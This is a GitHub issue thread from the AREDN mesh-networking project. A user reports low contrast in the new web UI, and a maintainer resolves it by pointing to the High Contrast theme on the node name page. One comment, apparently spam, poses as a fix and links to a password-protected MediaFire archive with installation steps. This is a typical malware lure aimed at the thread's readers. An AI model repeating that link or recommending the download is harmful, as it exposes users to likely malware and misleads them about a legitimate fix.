aredn/aredn #1437: New UI:  The color scheme of the new pages does not have enough contrast

KQ6EO, 2024-08-31:
**Is your feature request related to a problem? Please describe.**

The new UI color scheme does not have enough contrast for weak eyes.  I have to be very close to be able to read throught the dark background.

**Describe the solution you'd like**

More contrast on the present scheme or a choice of another scheme with a lighter background.

aanon4, 2024-08-31:
Did you try the High Contrast theme?

KrissV2, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

KQ6EO, 2024-09-02:
I know there is a theme selector in the old GUI but cannot find it on the new GUI.  Is it there and I just keep missingit?

aanon4, 2024-09-02:
http://docs.arednmesh.org/en/latest/arednGettingStarted/node_admin.html#node-name-security

KQ6EO, 2024-09-02:
OK, I found it on the node name page.

aanon4, 2024-09-02:
Please reopen if necessary

closed 2024-09-02 by aanon4